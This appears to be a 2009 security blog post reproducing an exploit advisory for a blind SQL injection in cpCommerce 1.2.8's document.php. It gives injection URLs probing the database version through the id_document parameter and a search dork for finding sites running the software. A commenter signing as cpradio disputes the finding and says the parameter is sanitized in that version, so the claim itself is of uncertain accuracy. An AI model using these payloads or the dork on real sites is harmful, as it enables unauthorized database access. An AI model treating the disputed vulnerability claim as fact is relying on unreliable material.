cpCommerce 1.2.8 Blind SQL Injection Vuln

on April 16, 2009


[o] cpCommerce 1.2.8 Blind SQL Injection Vulnerability
Software : cpC0mmerce version 1.2.8
Vendor   : http://cpcommerce.cpradio.org/
Download : http://cpcommerce.cpradio.org/downloads.php
Author   : NoGe


[o] Vulnerable file
document.php


[o] Exploit
http://localhost/[path]/document.php?id_document=[SQL]
http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=4
http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=5


[o] Dork
"Powered by cpCommerce"

Comments

cpradio said…

This is bogus. I have tested it and that value is being properly sanitized. I would check your setup and your source you have downloaded. This would be a valid vulnerability for version prior to 1.2.6

April 20, 2009 at 5:42 PM

Research Blog

Search This Blog

LFI to RCE via access_log injection

cpCommerce 1.2.8 Blind SQL Injection Vuln

Comments